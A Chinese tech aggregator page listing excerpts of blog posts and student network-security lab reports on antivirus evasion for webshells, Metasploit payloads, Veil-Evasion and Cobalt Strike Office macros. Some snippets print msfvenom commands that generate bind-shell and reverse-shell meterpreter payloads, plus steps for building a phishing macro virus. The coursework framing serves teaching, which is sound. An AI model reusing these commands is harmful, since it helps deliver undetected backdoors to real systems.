首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
最新php2023 免杀
2024-10-31
PHP木马免杀的一些总结
前言 这篇文章写一些php木马免杀的一些技巧,希望对大家有点帮助.这里解释一下什么是php木马,这里大体分为三种: 能完成写入文件.列目录.查看文件.执行一些系统命令等少量功能的,这种的是"小马". 可以在目标服务器上执行php代码,并和一些客户端(如菜刀.冰蝎)进行交互的一句话木马. 根据 PHP 语法,编写较多代码,并在服务器上执行,完成大量间谍功能的"大马" 以上php木马我们一般我们统称为webshell,这篇文章主要写一下如何对一句话木马变异变形来绕过WA
《Python绝技:运用Python成为顶级黑客》 用Python实现免杀
1.免杀的过程: 使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者远程连接进行操控. 输入命令: msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c 查看该c文件: 接着在Python中调用ctypes库,定义一个存在该shellcode的变量,把变量看作是一个C语言的函数,执行它即可.
浅谈C++源码的过国内杀软的免杀
以下只是简单的思路和定位.也许有人秒过,但是不要笑话我写的笨方法.定位永远是过期不了的. 其实这里废话一下 , 本人并不是大牛 ,今天跟大家分享下 .所以写出这篇文章.(大牛飘过) 只是个人实战的经验而已 ,没有任何技术含量.ok 我们开始 我们只谈vc++源码免杀 ,过掉 国内的杀毒软件 . 达到不损坏功能 正常上线 从而无视杀软的存在 首先说中国国内杀毒软件的特征 . 1 金山毒霸 ,我个人觉得杀的代码部分和字符串还是比较普遍的 .输入表函数 我个人不多见 . 2 瑞星 ,经实战经验
20165223《网络对抗技术》Exp3 免杀原理与实践
目录 -- 免杀原理与实践 免杀原理与实践 本次实验任务 基础知识问答 免杀扫描引擎 实验内容 正确使用msf编码器,msfvenom生成jar等文件,veil-evasion,加壳工具,使用shellcode编程 正确使用msf编码器,生成exe文件,进行免杀检测 使用msfvenom生成jar.php等文件,进行免杀检测 使用veil-evasion生成后门程序及检测 使用shellcode编程生成可执行文件并且进行免杀检测 使用加壳工具生成可执行文件并且进行免杀检测 通过组合应用各种技术实
2018-2019-2 网络对抗技术 20165337 Exp3 免杀原理与实践
基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:特征码就是一段数据.如果一个可执行文件(或其他运行的库.脚本等)包含特定的数据则被认为是恶意代码.AV软件厂商要做的就是尽量搜集最全的.最新的特征码库. 启发式恶意软件检测:根据些片面特征去推断:通过检测程序的行为是否属于恶意代码的行为来检测. (2)免杀是做什么? 想方设法让自己的后门程序避免被杀毒软件检测到,实现此程序的功能 (3)免杀的基本方法有哪些? 改变特征码:加壳,shellcode等手段 改变行为:反弹连接,隧道传
2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 1. 使用msf编码器生成各种后门程序及检测 msf编码器是非常实用的,但是我的实践表明,直接实用msf生成后门(exe文件)是不容易躲过杀毒的,因此我认为在这场GAME中MSF试用于生成C语言的shellcode. 2. 使用veil-evasion生成
2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧:(1.5分) 2 通过组合应用各种技术实现恶意代码免杀(1分) (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分) - 基础问题回答
2018-2019-2 网络对抗技术 20165323 Exp3 免杀原理与实践
一.实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellc
2018-2019-2 网络对抗技术 20165239Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践 win10 ip地址 192.168.18.1 fenix ip地址为 192.168.18.128 (1)杀软是如何检测出恶意代码的? •根据计算机病毒课程知道了每个病毒都有其对应的特征码,杀软是根据这些特征码来判定他是不是病毒. •根据该软件的行为进行检测如有异常行为,会被判定为风险文件或病毒. •基于行为的恶意软件检测:在启发式基础上对软件行为进行监控 (2)免杀是做什么? 通过一定的技术手段,将恶意软件处理
2018-2019-2 网络对抗技术 20165336 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165336 Exp3 免杀原理与实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 根据计算机病毒课程知道了每个病毒都有其对应的特征码,杀软是根据这些特征码来判定他是不是病毒. 根据该软件的行为进行检测如有异常行为,会被判定为风险文件或病毒. 基于行为的恶意软件检测:在启发式基础上对软件行为进行监控 (2)免杀是做什么? 通过一定的技术手段,将恶意软件处理,使之不会被杀毒软件发现. (3)免杀的基本方法有哪些? 改变特征码:对于.exe文件可以
2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践
2018-2019-2 20165316 『网络对抗技术』Exp3:免杀原理与实践 一 免杀原理与实践说明 (一).实验说明 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧:(1.5分) 任务二:通过组合应用各种技术实现恶意代码免杀(1分) 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分) (二).基础问题回答 问:杀软是如何检测出恶意代码的? 基于特
20165306 Exp3 免杀原理与实践
Exp3 免杀原理与实践 一.实践内容概述 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 4.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 简单来说一段特征码就是一段或多段数据.如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. AV软
2018-2019-2 网络对抗技术 20165303 Exp3 免杀原理与实践
实验内容 一. 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) - 1.使用msf编码器生成各种后门程序及检测 - 2.使用veil-evasion生成后门程序及检测 - 3.半手工注入Shellcode并执行 二. 通过组合应用各种技术实现恶意代码免杀(0.5分) (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 三.1.3
20145236《网络攻防》 Exp3 免杀原理与实践
20145236<网络攻防> Exp3 免杀原理与实践 一.基础问题回答 1.杀软是如何检测出恶意代码的? 恶意代码有其特有的特征码,杀软将特征码加入检测库中,当检测到一段代码中具有这样的特征码时就可以判断为恶意代码. 为了防止自身特征码被检测,有些恶意代码使用了免杀加壳软件进行加壳,一些流行的加壳软件已经可以检查出来,如果被这样的加壳软件加壳就可能是恶意代码. 判断该代码是否有恶意行为,若有就会判断代码是恶意代码. 2.免杀是做什么的? 通过各种手段免除计算机对恶意代码查杀即为免杀. 3.免
网络对抗技术 2017-2018-2 20152515 Exp3 免杀原理与实践
基础问题回答 (1)杀软是如何检测出恶意代码的? 答:分析恶意程序的行为特征,分析其代码流将其性质归类于恶意代码. (2)免杀是做什么? 答:一般是对恶意软件做处理,让它不被杀毒软件所检测,也是渗透测试中需要使用到的技术.通常是要掩盖恶意代码的特征. (3)免杀的基本方法有哪些? 答: 改变特征码 如果你手里只有EXE 加壳:压缩壳 加密壳 有shellcode(像Meterpreter) 用encode进行编码 基于payload重新编译生成可执行文件 有源代码 用其他语言进行重写再编译(ve
2018-2019 Exp3 免杀原理与实践
2018-2019 Exp3 免杀原理与实践 目录 一.实验内容说明及基础问题回答 二.实验过程 Task1 1.使用msf编码器生成后门程序及检测 Task1 2.msfvenom生成jar等文件 Task1 3.veil-evasion Task1 4.用shellcode编程 Task 2 通过组合应用各种技术实现恶意代码免杀 Task 3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 三.问题与思考 一.实验内容说明及基础问题回答 1.实验内容 (1)正
2017-2018-2 《网络对抗技术》 20155322 Exp3 免杀原理与实践
#2017-2018-2 <网络对抗技术> 20155322 Exp3 免杀原理与实践 [-= 博客目录 =-] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-正确使用msf编码器 2.2-veil-evasion 2.3-组合应用技术实现免杀 2.4-靶机实测 2.5-基础问题回答 3-资料 1-实践目标 1.1-实践介绍:免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件
Metasploit+python生成免杀exe过360杀毒
Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT= LHOST= -e x86/shikata_ga_nai -i -f py -o /opt/bk.py 2.拷贝出bk.py到window32系统进行修改,修改如下(这里的红色标注是修改增加的代码,其他不变) from ctypes import * import ct
迁移Veil:手工打造Windows下编译的免杀Payload
作者:RedFree 本文转自乌云 Veil对Payload的免杀已经做的很好了,最新的Veil有39个可用的Payload.但是有时候需要使用Windows来完成所有的渗透测试工作,Linux和Windows切换来切换去很不方便.让我的渣本安装个虚拟机更是浪费资源.因此,在Windows下生成免杀Payload已成为当务之急. 一开始我选择了在Kali下使用Veil生成Python版的Payload然后再到windows下使用Py2exe或是pyinstaller来编译打包生成可执行文件.但是
20182217刘洪宇EXP3_免杀原理
免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的.AV(Anti-virus)是很大一个产业.其中主要的技术人员基本有编制恶意软件的经验. 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础. 1.恶意软件检测机制 1.1 基于特征码的检测1.1.1 特征库举例-Snort1.2 启发式恶意软件检测1.3 基于行为的恶意软件检测-- 1.1 基于特征码的检测 简单来说一段特征码就是一段
Cobalt-Strike Office宏利用与免杀
1.打开Cobalt-Strike生产Office宏病毒. 首先需要设置监听器.因为钓鱼的目标比较单纯,在这里就不采用域前置技术. 然后使用攻击模块,生产Office宏病毒. 设置好监听器. 生成宏病毒 2.将宏病毒放入word 首先打开Word,在审阅中编辑宏: 创建新的宏: 将生成的宏病毒放入Microsoft Word目录下的ThisDocument,注意如果宏位置写错了很容易报错. 按下Ctrl+S,将文件保存为启用宏的Word文档,注意这里的作者需要修改,否则默认会使用账户名 此时带宏
热门专题
linux卸载teamviewer
elementui label超过高度出现滚动
java 事务的概念
xcode 项目打开 no scheme
stm32f103 内部高速晶振最高72M
linux 搭建几天环境
xpath不带某个属性
一行中四个div平均分配
wkhtmltopdf 分页数量
mongotemplate 聚合操作类型转换
linux下硬盘 装入widows
thinkphp3 cache(true) 更新后
PLSQL修改中文编码
tls1.3有必要开启吗
Fastjson 转换List<Bean> 属性
shell字符串处理命令
oracle linux版本下载
Linux的镜像文件要跟虚拟机对应吗
qt linux 生成 core
Arduino 多线程 Metor